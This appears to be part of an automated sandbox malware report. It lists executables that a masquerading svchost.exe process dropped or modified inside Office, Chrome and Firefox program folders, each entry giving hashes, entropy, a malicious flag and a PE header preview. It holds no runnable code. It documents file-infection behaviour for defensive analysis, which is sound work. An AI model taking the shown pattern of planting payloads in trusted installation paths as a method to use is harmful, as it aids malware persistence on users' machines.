                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DE340CF94C02382D0244743F84E995B721BD5CF807E23C1E9EE293EC1FCB1BE75571CFBB6E1835AC245D2D1A652E3CA0C6DD331030C899A596CD09EC816BFC99
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2199552
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.789000238208928
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:283pZ3kd0CuEeN0LUmRXzYs65msDmg27RnWGj:qKuUQY15TD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:569E5BB0586AFDEAE978BDC9B614FAB1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E2C2AB07D5EDA7A792FE9E08B86AAE9073F2EDA0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EEA32318ADE807DB9FE0BBA9EB6C5AC4F18EF4DD72DAEAA5CE4BBCBB334BDD4A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3D57A2A17AE677A169B41D1528EC3371EFB3C7CB0DED1EE8E600788180FB4FB159DD1C45F92B8D7AE9EC211E0A0BF77AED4571D76D585F2EEE9CEFE42F820B2D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4971008
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.670826969140575
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:/Erw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+MH:JA4oGlcR+glEdOPKzgVZeD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A208813DAF20298E47282F2EC37B2800
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:287C9B2D435EE093D5E8F0DBBD587C6C2493FF61
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:70634A0E8F6429FD03A7E29C0D89784AF45EE64C93B33BA78930DAB5AA7D95EF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B671C366BF262DC9EA27BFAF481E4AD4ADF208F3B58C05BB518EC73F38D4283527430B494F5FCEBB9C77699DA4A830A39A872F821BEA1B7079CA0B71F23BCECB
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.829762306276281
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:78ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKk:6v2gM+qwXLg7pPgw/DSZHcD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8CAE6A0099A5378E1DC9C0428665606B
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FBF6D3EC1DC938D48D84FBCA576FC300E226B5A3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:296633CE4E9B84287DD9F03886893E4209F688F106CCD3F2DEBC7285EA1964FD
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E5D8CFC6DAE84A99D070FF34A603858EF1FC40BF1E48B681BDE049D16C30398D23047CB2950C09BD9951B8137A1936D13EE607E4D3EF8386C27ABCACA52F7BE5
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.829763803509709
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:O8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKk:tv2gM+qwXLg7pPgw/DSZHcD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07625A76EE445F25524EA9A561D9F41A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BFE6A333076E77D11A4EF7A63F969C13441D53EB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2F04A2FEEEC4E6017AAD43D59EE9F390430F0DF0C706F7E67FC8CA0AAFCB08C
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:96DF31FE04D093AF4F6C5B81528FC2223D758B09862D40D52A0B39A66192287363F917A487B5FF074C4B39E46FA1F21F4C39023D6907056D9E070551754FAD2F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......uK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2156544
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.953572887715102
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:itjqL8fH+8aUbp8D/8+xyWA3sqjnhMgeiCl7G0nehbGZpbD:ajKK+81FI/8zNDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:209B6684D3A9E2C872FF5D1FB55908E9
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F9FABCED07707B7EB9F2AD6391B0537F1A527283
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A7976217901B2CE1BE02A602BDA94AB7A22C256E3D04AE5EAA3A3B113C0F4D06
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:446D4E6570A6A64968D3DFEF18B9D696B40C3545CC848DD17A177295D28F78820FBEC521C96C790406FE5368064D45296726FF585975CBB1A395A40F18D8FFC6
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......(!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2370560
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.032386569781628
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:BAMsOu3JfCIGnZuTodRFYKBrFDbWp7Dmg27RnWGj:BAMa38ZuTSeD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2A4EC22AB9CAB34E0E4FDEBD50F0FE70
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F536EB7556BADBE477CB6136F1BCCA6096BFB4AB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2EE8900B395B6E290D67196151E18DC1C2F551760E47F1A6DCFAC0E4BD410C40
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0755EC588F34B4B16F3F1F70A4388DD80EE5CF8A681D66DC91B8CE10A09F1472C884C5AF406BCD82AE91EED30A8E2D9BC5903AC8551E7DD76FB5819B996D516C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.......%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1984512
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.104330390446351
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:0wbK7tnhD4aH6wD2Krx5NgOOagQE8JDsqjnhMgeiCl7G0nehbGZpbD:0SK7Fhslq2EPfOGEKDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:50D10D902E19A60EA604F44F2E2409A8
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9D4B9203351E9768BA9D696E506D117E4E501D7A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CBD0CAB8C3DCF251F011ECD8C8DE1D843A4029C62E7D163A760514B3FEBEC5E6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D69B6EEC69D158EDF91B49403545124BF3C895E64CB7CEDC4C6CE47E3CA83AE126AAF8BCBBF872B4DB7F4E9AB134A694E165386EBC0C5F34870E4987E64FBD97
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@....................................t..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1779712
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.1580603115145545
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:RKI7Twj5KDHxJ1FxyD+/wsG18bbQzsqjnhMgeiCl7G0nehbGZpbD:Rv7e0j31mD+/wDGbwDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D3619955C035517FFBD3560F6E89F971
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:523F72F9F9EA923C2F59B5AEC3B04C1E727AB9FB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C10EC087F0FC528E2B63073849DF7248152F2DD7547F7808C929FED6D87321B1
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AA0C4868FA5C20DC06294241D57F07777A94333701BD42C350FE256329EF55AF13FAD3529B3A83489ECFF349F8A84914AFC7F9B5F5F580B9A252A5EB31FA424F
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@....................................H..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1378304
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.377409159333965
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:wQUVPDHhSwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:TyhSwsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:63216F380DE829D3807B6E8EBF7F3910
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:AC2FB05FC4F6F8798DCDDF3CCC5FD5DD54A3A2A0
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5AD4464C0006DF640AD6B6DB4D5FF46E2A320AE775DCF94A8FBB8DC0C14142EC
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B62B73284E48082AB2AF97F5A4D0B8B6D130EEC12509253582D45962811CF24BEA331565E107E6AE3DFF1DF4320158D2F1067C49D9C3015E5588B98841B3F07C
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p............ ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1286656
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.222101790030088
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:LsFfc1VyFn5UQn652bO4HLsqjnhMgeiCl7G0nehbGZpbD:LsFcIn5rJ5Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AA7616A4074AC0735D68DF4C39B2A444
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:96F4E507612008B5CD2CC0821632D079C2FD86BB
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:996B433AE1866ADDAB3148A607F979721A1A5FF1EEE1EDD106E0DF59433E0EED
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:37837B78F7CAB35E5EAD92728C29DFB95BA7E0173AD115D6352D859F222C3A0FC65528FB11867AA46772532D8947459E6BC026CA863ABBC0D13FF8E94180512D
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.49426801002435
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:1t9o6p4xQbiKI69wpemIwpel98sqjnhMgeiCl7G0nehbGZpbD:1t9faQbtl2peapelCDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1A0143A36145CB1E658BB441CA2B2E58
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F22FCE0A93BD0EA9A64A12E19EFCCC42715F94F6
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:37E48496A5D4ADC4CAA0B85B79C72FAD9FF94B6EFBF4FC16BBE19D48F097283A
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F15A1DCD68A169E974757D3E56E0822A5539E549191FF832CE1D95F7D7616E344F7A70361B298CC960E20A172E3CDB6561F91EFC9798D1489FB3FFE9C96900A8
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.....................................k.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.34781386899821
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:8QVTZu0JzsqjnhMgeiCl7G0nehbGZpbD:TVTZuyDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:12F61F9523F9F4F4D33E190AC66E4E5E
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:ED2F5E0F704D973F54083163B7844A4684BACAFF
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6089109508BD9BCDFFC1579FAFF0D1CA3576C60117E3220DD2DEE997C21FF5E3
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CE2A8009A47A69E4BF3522DCDF0AC1717056335142701B2DD6E3ECFB44DE7211E827893E6FB8520A112F1647F7A32F0F9B30D02584CA5A3CD9F1160378EC79F8
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......5..... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.808347232720817
                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:KC1vpgXcZHz1sqjnhMgeiCl7G0nehbGZpbD:KC1vpIcNpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6D680A045B455459DD3F5B794D0B7527
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:66A06A3D4A6DA2BE2ED6B6A78889A5E69E02EC29
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BF567F91FBE860BFD355CCE9D67B72FCC5F969AB3B62F6474D2E6793BFB54827
                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8B3F51196FCA89D253763850C46650B0731A7B07935296AE48FC757C72CF68E7EB7C7E2D9274B66C9858A6B98F88CBE36B22160C2794E30F9168410A7A43382
                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
